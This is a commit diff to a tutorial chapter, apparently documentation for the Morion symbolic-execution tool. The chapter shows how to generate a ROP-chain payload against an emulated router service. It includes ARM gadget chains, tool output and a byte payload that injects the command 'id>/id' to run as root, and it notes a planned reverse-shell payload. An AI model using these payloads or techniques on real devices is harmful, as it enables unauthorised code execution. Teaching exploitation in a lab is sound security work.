Update section morion_rop_generator

This commit is contained in:
Damian Pfammatter
2024-05-01 16:07:16 +02:00
parent a7f84b2c1b
commit 7174915d79
+29 -11
View File
@@ -15,6 +15,8 @@
3. [Payload Generation](./6_exploitation.md#payload-generation)
4. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit)
2. [Analysis Module morion_rop_generator](./6_exploitation.md#analysis-module-morion_rop_generator)
1. [Payload Generation](./6_exploitation.md#payload-generation-1)
2. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit-1)
<!--TODO--------------------------------------------------------------------------------------------
- [X] Can we integrate morion/circled.rop3.py to circled.server.py?
- [X] Try out manual exploit
@@ -429,8 +431,13 @@ pwndbg> continue
If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
## Analysis Module morion_rop_generator
[circled.init.yaml](../morion/circled.init.yaml#L37):
The above process to get a payload triggering the intended ROP chain is rather cumbersome, since we
need to access register and/or memory ASTs manually to define the necessary model restrictions. That
is where the module `morion_rop_generator` comes into play.
### Payload Generation
Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file
`circled.yaml` and will do the rest automatically. For instance, we included the same ROP chain as
depicted in Figure 6.1 in [circled.init.yaml](../morion/circled.init.yaml#L37) (named `default`):
```yaml
[...]
ropchains:
@@ -448,7 +455,7 @@ ropchains:
['0x0000c9b8', '06 00 a0 e1', 'mov r0, r6', 'Gadget 1.0']
- preconditions:
regs:
'r0': '0xbeffc250' # r6 == 0xbeffc0c4+396 == 0xbeffc250
'r0': '0xbeffc250' # r0 == 0xbeffc0c4+396 == 0xbeffc250
mems:
'0xbeffc250': '0x69' # 'i'
'0xbeffc251': '0x64' # 'd'
@@ -462,9 +469,14 @@ ropchains:
instruction:
['0x0000c9bc', 'b7 f2 ff eb', 'bl #0x94a0', 'Gadget 1.1']
```
The module `morion_rop_generator` is then run like shown in the next excerpt. The module first
symbolically executes the recorded trace and then tries to transfer control to the specified ROP
chain. For each instruction in the chain it loads the given preconditions, tries to solve them,
concretizes the found solution, symbolically executes the instruction and then proceeds with the
next one. At the end of the chain, a potential payload is returned.
```
$ morion_rop_generator circled.yaml default
[...]
[2024-04-16 14:16:04] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc
[2024-04-16 14:16:04] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00
@@ -584,12 +596,16 @@ s+0464: 69 64 3b 23 00
---
[2024-04-16 14:16:06] [INFO] ... finished dumping payloads.
```
- CyberChef *From Hex* (Delimiter: `Space`) | *To Hex* (Delimiter: `0x with comma`)
- Merge payloads since they originate from the same file
[circled.server.py](../server/circled.server.py#L58):
Since `fgets` was called twice in our trace (at trace instructions 5132 and 15451) the module
returns two payloads, which however originate from reading the same file (`circleinfo.txt`). We
therefore need to merge them so a single one. As before, we added the resulting payload to
[circled.server.py](../server/circled.server.py#L57), which serves it when started with command-line
argument `--payload "poc2"`.
```python
[...]
# Serve requests for circleinfo.txt
[...]
elif payload == "poc2":
p = bytearray([
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
[...]
@@ -604,9 +620,11 @@ p = bytearray([
0x43,0x43,0x43,0x43,0x69,0x64,0x3e,0x2f,
0x69,0x64,0x3b,0x23,0x00
])
[...]
```
### Run PoC Exploit
##
## TODO
- Explain `circled.server.py`
- Test reverse shell payload
- Explain reverse shell payload
@@ -666,7 +684,7 @@ HttpHandler.cmd_addr = cmd_addr - 0x1000
```
We fill up with a nonexistent command `X...X;cmd` to improve ASLR brute-forcing?
## Todo
- Note: The shown exploit could easily be generated without using symbolic execution. However, we
have chosen it since it is rather easy to follow along and suitable to explain how Morion works.